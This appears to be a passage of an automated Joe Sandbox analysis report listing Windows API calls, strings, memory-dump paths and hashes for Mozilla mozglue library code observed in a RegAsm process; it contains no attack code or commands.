                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,6CC81BE3,?,?,6CC81D96,00000000), ref: 6CC81D18
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,6CC81BE3,?,?,6CC81D96,00000000), ref: 6CC81D4C
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC81DB7
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC81DC0
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC81DDA
                                                                                      • Part of subcall function 6CC81EF0: GetCurrentThreadId.KERNEL32 ref: 6CC81F03
                                                                                      • Part of subcall function 6CC81EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6CC81DF2,00000000,00000000), ref: 6CC81F0C
                                                                                      • Part of subcall function 6CC81EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6CC81F20
                                                                                    • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6CC81DF4
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 1880959753-0
                                                                                    • Opcode ID: ebcb6e301a00faaf143ae2bbd784498adb6af81b87cf87779cd58181d6bcb967
                                                                                    • Instruction ID: cb0a82b2f0db93b956465db9ded3e4cc19976113097c018a5294d4f85013352e
                                                                                    • Opcode Fuzzy Hash: ebcb6e301a00faaf143ae2bbd784498adb6af81b87cf87779cd58181d6bcb967
                                                                                    • Instruction Fuzzy Hash: 0B4164B52017009FCB10CF69C498B5ABBF9FB89318F10446EE9AA87B41DB71F854CB94
                                                                                    APIs
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBE220,?,?,?,?,6CC43899,?), ref: 6CC438B2
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBE220,?,?,?,6CC43899,?), ref: 6CC438C3
                                                                                    • free.MOZGLUE(00000000,?,?,?,6CC43899,?), ref: 6CC438F1
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC43920
                                                                                    • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6CC43899,?), ref: 6CC4392F
                                                                                    • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6CC43899,?), ref: 6CC43943
                                                                                    • RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6CC4396E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                    • String ID:
                                                                                    • API String ID: 3047341122-0
                                                                                    • Opcode ID: 7cbc156125db256caabd5373d54ac80fb1d1d4e85ea225023b3518bd97a626a4
                                                                                    • Instruction ID: effeb415e0b3bdc624c5972bd2ad697245cf154774d3e70c63b45919c07aac4e
                                                                                    • Opcode Fuzzy Hash: 7cbc156125db256caabd5373d54ac80fb1d1d4e85ea225023b3518bd97a626a4
                                                                                    • Instruction Fuzzy Hash: F221F172600614DFD720DF65C884B86B7B9EF85328F19C429E95A97B10E735F846CB90
                                                                                    APIs
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC784F3
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7850A
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7851E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7855B
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7856F
                                                                                    • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC785AC
                                                                                      • Part of subcall function 6CC77670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CC785B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7767F
                                                                                      • Part of subcall function 6CC77670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CC785B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC77693
                                                                                      • Part of subcall function 6CC77670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CC785B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC776A7
                                                                                    • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC785B2
                                                                                      • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                                      • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                                      • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                    • String ID:
                                                                                    • API String ID: 2666944752-0
                                                                                    • Opcode ID: e605cb9b147a7111abbd5410d7fcf34cc84e72795510a9a93720eb420cfbb820
                                                                                    • Instruction ID: 4d10ac50577aada7d362b61e3a0208b1fa88210924dcbc24274bf3900a8d925e
                                                                                    • Opcode Fuzzy Hash: e605cb9b147a7111abbd5410d7fcf34cc84e72795510a9a93720eb420cfbb820
                                                                                    • Instruction Fuzzy Hash: 03218D742006018FEB24DB64D888E5AB7B5FF4430CF14482DE65B93B41EB35F959CB65
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CC41699
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC416CB
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC416D7
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC416DE
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC416E5
                                                                                    • VerSetConditionMask.NTDLL ref: 6CC416EC
                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CC416F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                    • String ID:
                                                                                    • API String ID: 375572348-0
                                                                                    • Opcode ID: e24f57c6cc0dcdbc0680845e64a71ef5d9877aeed16889d08876a397a2388276
                                                                                    • Instruction ID: 2925a08fddee8f5a54bbaee1171f1445e7a55aefe934bad04d5e26a7ccde79d0
                                                                                    • Opcode Fuzzy Hash: e24f57c6cc0dcdbc0680845e64a71ef5d9877aeed16889d08876a397a2388276
                                                                                    • Instruction Fuzzy Hash: 8A21D5B07402086FEB115BA8CC85FFB737CEF86704F008568F6459B280D678DD5486A1
                                                                                    APIs
                                                                                      • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                                      • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F619
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CC7F598), ref: 6CC7F621
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F637
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000,?,6CC7F598), ref: 6CC7F645
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000,?,6CC7F598), ref: 6CC7F663
                                                                                    Strings
                                                                                    • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CC7F62A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                    • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                    • API String ID: 1579816589-753366533
                                                                                    • Opcode ID: c714ea776e7f8b3f81ded6a531ee0fa0fb2d99447b1f5984636899f167b7c6da
                                                                                    • Instruction ID: 4778df622c67525bb7c54f3533e28710fa10add5ef69b097b7c5efe91115fbe4
                                                                                    • Opcode Fuzzy Hash: c714ea776e7f8b3f81ded6a531ee0fa0fb2d99447b1f5984636899f167b7c6da
                                                                                    • Instruction Fuzzy Hash: 7311A379201205AFCB54AFA9C9989A5B779FF86758B100016FA0587F01EB71EC21CBB4
                                                                                    APIs
                                                                                      • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                                      • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                                    • LoadLibraryW.KERNEL32(combase.dll,6CC41C5F), ref: 6CC420AE
                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6CC420CD
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC420E1
                                                                                    • FreeLibrary.KERNEL32 ref: 6CC42124
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                    • String ID: CoInitializeSecurity$combase.dll
                                                                                    • API String ID: 4190559335-2476802802
                                                                                    • Opcode ID: 2e1e177a3e7b781c2ed851fa9a27d512037c1acfad0a9bfa6c3213e98608d4e1
                                                                                    • Instruction ID: cdf4e73a16d7355498c12083d25a2eb043f2d541ade559201004c174f854c738
                                                                                    • Opcode Fuzzy Hash: 2e1e177a3e7b781c2ed851fa9a27d512037c1acfad0a9bfa6c3213e98608d4e1
                                                                                    • Instruction Fuzzy Hash: 3A216A7A200209EFDF118F99DD99D9A3BB6FB4A325F008018FA0592710E7719866DF65
                                                                                    APIs
                                                                                      • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                                      • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                                    • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6CC41FDE
                                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6CC41FFD
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC42011
                                                                                    • FreeLibrary.KERNEL32 ref: 6CC42059
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                    • String ID: CoCreateInstance$combase.dll
                                                                                    • API String ID: 4190559335-2197658831
                                                                                    • Opcode ID: 97dc4c378ef58d7301fb0ca69b3c3e1fc0db59724173afac8a544d8d37624cfa
                                                                                    • Instruction ID: 7bb09187a104818e4711fcb221c36e0437221380d3f725931d81ba8d7a227d7c
                                                                                    • Opcode Fuzzy Hash: 97dc4c378ef58d7301fb0ca69b3c3e1fc0db59724173afac8a544d8d37624cfa
                                                                                    • Instruction Fuzzy Hash: 75117C7C201204AFDF20CF95CAA9E967BB9EF8635AF008029F905D3750E731A805DB65
                                                                                    APIs
                                                                                      • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                                      • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                                    • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6CC6D9F0,00000000), ref: 6CC40F1D
                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6CC40F3C
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC40F50
                                                                                    • FreeLibrary.KERNEL32(?,6CC6D9F0,00000000), ref: 6CC40F86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                    • String ID: CoInitializeEx$combase.dll
                                                                                    • API String ID: 4190559335-2063391169
                                                                                    • Opcode ID: e49932e3503dd845d8caf27f69aa5285c6ad079242e534b5142fae23961b475e
                                                                                    • Instruction ID: 95b6fa3e6f6fb75e1b225d5c36bb87106c8efdef1d3c7919324f75b502647d18
                                                                                    • Opcode Fuzzy Hash: e49932e3503dd845d8caf27f69aa5285c6ad079242e534b5142fae23961b475e
                                                                                    • Instruction Fuzzy Hash: A611527D7452819FEF00DFE9CA58A863774FB9A326F008629ED0592B41F770A409CA69
                                                                                    APIs
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F559
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7F561
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F577
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F585
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7F5A3
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_pause_sampling, xrefs: 6CC7F3A8
                                                                                    • [I %d/%d] profiler_resume_sampling, xrefs: 6CC7F499
                                                                                    • [I %d/%d] profiler_resume, xrefs: 6CC7F239
                                                                                    • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6CC7F56A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                    • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                    • API String ID: 2848912005-2840072211
                                                                                    • Opcode ID: 3c5ecaf3caea1818e5c270962211a228a004e3df296c17d6cd52f1c317ed55bb
                                                                                    • Instruction ID: 59aec5b42fcf22e7c4658734fbb2c6a3f8a71c18cde73d1b74f3551bc0d374ee
                                                                                    • Opcode Fuzzy Hash: 3c5ecaf3caea1818e5c270962211a228a004e3df296c17d6cd52f1c317ed55bb
                                                                                    • Instruction Fuzzy Hash: 16F0547D7002049FDE106BE9D89895AB77DEB8629DF000055FA0593B11EB759C058B79
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,6CC40DF8), ref: 6CC40E82
                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6CC40EA1
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC40EB5
                                                                                    • FreeLibrary.KERNEL32 ref: 6CC40EC5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                    • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                    • API String ID: 391052410-1680159014
                                                                                    • Opcode ID: 850acedd25b99a68be3521b7cb5894c940a760b2dc5794777933eb43c6611ce2
                                                                                    • Instruction ID: 397ae4df68db93a2b021eb2f472b8f9483f39ca12a48b097a7c036618861d6f6
                                                                                    • Opcode Fuzzy Hash: 850acedd25b99a68be3521b7cb5894c940a760b2dc5794777933eb43c6611ce2
                                                                                    • Instruction Fuzzy Hash: ED01F67C7403829FEF02CFE9D998F4637B5F756319F1085A9E941A2B80F774AC148A1A
                                                                                    APIs
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F619
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CC7F598), ref: 6CC7F621
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7F637
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000,?,6CC7F598), ref: 6CC7F645
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000,?,6CC7F598), ref: 6CC7F663
                                                                                    Strings
                                                                                    • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CC7F62A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                    • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                    • API String ID: 2848912005-753366533
                                                                                    • Opcode ID: ffc1337b0306320c4519b589804a255f6b18b964a7d56843ec55e5e26d6213ef
                                                                                    • Instruction ID: 955aa761d4daec9be374b1bbd7e1032767be0795b111b2fa66af0dd0ca2c9426
                                                                                    • Opcode Fuzzy Hash: ffc1337b0306320c4519b589804a255f6b18b964a7d56843ec55e5e26d6213ef
                                                                                    • Instruction Fuzzy Hash: 3BF0547D200244AFDB106BE9889895AB77DEF8629DF000055FA0593B51EB759C058B79
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6CC6CFAE,?,?,?,6CC331A7), ref: 6CC705FB
                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6CC6CFAE,?,?,?,6CC331A7), ref: 6CC70616
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6CC331A7), ref: 6CC7061C
                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6CC331A7), ref: 6CC70627
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: _writestrlen
                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                    • API String ID: 2723441310-2186867486
                                                                                    • Opcode ID: 9717193d6b4936a832bcccc0a3173ba9617d0cf678eff63da4ed1de1833f9121
                                                                                    • Instruction ID: 8448eb741d95dbd6a7c897f767ed284fa9503f13eda64439af8da0f14e1fa635
                                                                                    • Opcode Fuzzy Hash: 9717193d6b4936a832bcccc0a3173ba9617d0cf678eff63da4ed1de1833f9121
                                                                                    • Instruction Fuzzy Hash: CCE08CE2A0201037F5142296AC8ADFB761CDBC6234F080039FD1D82301F94BAD1A51F6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b1ffe751c343994b50fda7c0a4a2c787b5bfa0025e602c680fe3f92877cafbc4
                                                                                    • Instruction ID: 32884f1deb3cd39dbef57196997e50be86062bd21152c29875512aa4b00f484b
                                                                                    • Opcode Fuzzy Hash: b1ffe751c343994b50fda7c0a4a2c787b5bfa0025e602c680fe3f92877cafbc4
                                                                                    • Instruction Fuzzy Hash: 5FA148B4A00745CFDB24CF69C594A9AFBF1BF89304F44866ED84A97B01E730A945CFA0
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC914C5
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC914E2
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC91546
                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6CC915BA
                                                                                    • free.MOZGLUE(?), ref: 6CC916B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
